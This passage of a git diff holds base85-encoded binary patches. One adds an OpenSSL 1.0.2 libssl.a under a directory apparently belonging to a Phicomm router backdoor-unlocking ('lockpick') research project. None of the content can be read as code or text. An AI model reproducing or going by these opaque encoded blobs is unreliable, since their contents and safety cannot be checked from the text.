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

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/libssl.a b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/libssl.a
new file mode 100644
index 0000000000000000000000000000000000000000..1303a1104310ad9f0be919e9daf2207f9d9a39a4
GIT binary patch
literal 539090
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
